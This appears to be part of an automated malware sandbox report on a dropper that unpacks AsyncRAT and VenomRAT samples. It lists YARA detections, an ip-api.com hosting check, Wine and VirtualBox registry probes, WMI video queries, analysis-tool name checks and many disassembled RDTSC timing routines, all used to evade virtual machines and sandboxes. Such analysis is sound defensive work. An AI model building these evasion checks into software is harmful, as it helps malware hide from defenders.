Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2304, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.H3tyh96.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: 22.0.ClientAny.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ClientAny.exe PID: 7160, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, type: DROPPED

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-12084
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9694

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: H3tyh96.exe	Binary or memory string: PROCESSHACKER.EXE
Source: H3tyh96.exe, 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, H3tyh96.exe, 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3EF41B second address: 3EECA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f nop 0x00000010 pushad 0x00000011 xor dword ptr [ebp+122D3071h], edi 0x00000017 mov dword ptr [ebp+122D1F16h], edi 0x0000001d popad 0x0000001e push dword ptr [ebp+122D0F9Dh] 0x00000024 or dword ptr [ebp+122D1F21h], eax 0x0000002a call dword ptr [ebp+122D3B17h] 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D308Dh], edi 0x00000037 jmp 00007F0084E2F658h 0x0000003c xor eax, eax 0x0000003e xor dword ptr [ebp+122D1C71h], ebx 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 pushad 0x00000049 sub dword ptr [ebp+122D1C71h], ecx 0x0000004f popad 0x00000050 mov dword ptr [ebp+122D2EB8h], eax 0x00000056 clc 0x00000057 mov esi, 0000003Ch 0x0000005c xor dword ptr [ebp+122D3071h], esi 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 stc 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D1F26h], edi 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jbe 00007F0084E2F64Ch 0x00000079 add dword ptr [ebp+122D1F26h], ecx 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D2372h], ebx 0x00000089 push eax 0x0000008a pushad 0x0000008b pushad 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3EECA3 second address: 3EECB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F0085357C16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559B96 second address: 559BAE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0084E2F64Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F0084E2F648h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 559BAE second address: 559BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C208 second address: 56C213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0084E2F646h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C213 second address: 56C22D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0085357C20h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C22D second address: 56C231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C231 second address: 56C247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F0085357C1Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C247 second address: 56C24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C24B second address: 56C252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C39A second address: 56C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0084E2F646h 0x0000000d js 00007F0084E2F646h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C3AD second address: 56C3C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jc 00007F0085357C16h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C3C2 second address: 56C3D2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0084E2F648h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C862 second address: 56C866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F0A1 second address: 56F0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F1BF second address: 56F1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F302 second address: 56F315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F0084E2F646h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F315 second address: 56F319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F3F9 second address: 56F3FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F3FD second address: 56F418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F0085357C18h 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F418 second address: 56F41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F41E second address: 56F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F423 second address: 56F42D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0084E2F64Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F42D second address: 56F4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F0085357C1Fh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F0085357C1Ch 0x00000016 pop eax 0x00000017 jl 00007F0085357C1Eh 0x0000001d pushad 0x0000001e add cl, 00000012h 0x00000021 movsx ecx, dx 0x00000024 popad 0x00000025 mov cx, 0B9Dh 0x00000029 push 00000003h 0x0000002b jnc 00007F0085357C17h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F0085357C18h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d push 00000003h 0x0000004f mov edi, dword ptr [ebp+122D2F58h] 0x00000055 push EDD97D21h 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F4A5 second address: 56F4FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0084E2F64Fh 0x0000000b popad 0x0000000c xor dword ptr [esp], 2DD97D21h 0x00000013 add dx, 0C5Dh 0x00000018 lea ebx, dword ptr [ebp+12453FC6h] 0x0000001e mov cx, 90D9h 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F0084E2F652h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F0084E2F658h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 581280 second address: 581284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55EBA8 second address: 55EBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55EBAC second address: 55EBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0085357C1Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55EBC0 second address: 55EBC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD25 second address: 58DD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD29 second address: 58DD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD2F second address: 58DD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD35 second address: 58DD3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E26E second address: 58E272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E272 second address: 58E27C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0084E2F646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E400 second address: 58E405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E558 second address: 58E55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E6DE second address: 58E6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E958 second address: 58E963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E963 second address: 58E96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0085357C16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E96D second address: 58E977 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0084E2F646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EAC5 second address: 58EACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED9F second address: 58EDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EDA3 second address: 58EDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EDAE second address: 58EDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F0084E2F646h 0x0000000f ja 00007F0084E2F646h 0x00000015 ja 00007F0084E2F646h 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EDD0 second address: 58EDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EEF2 second address: 58EEFE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0084E2F646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EEFE second address: 58EF18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0085357C25h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EF18 second address: 58EF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0084E2F655h 0x0000000d jmp 00007F0084E2F650h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EF47 second address: 58EF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0085357C20h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EF60 second address: 58EF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F650h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EF74 second address: 58EF78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EF78 second address: 58EF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58F5F7 second address: 58F604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F0085357C16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58F77B second address: 58F797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F654h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58F797 second address: 58F79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591547 second address: 591551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591551 second address: 591555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591555 second address: 59155D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5947BD second address: 5947C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5947C1 second address: 5947C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5947C7 second address: 5947CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5947CD second address: 5947D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
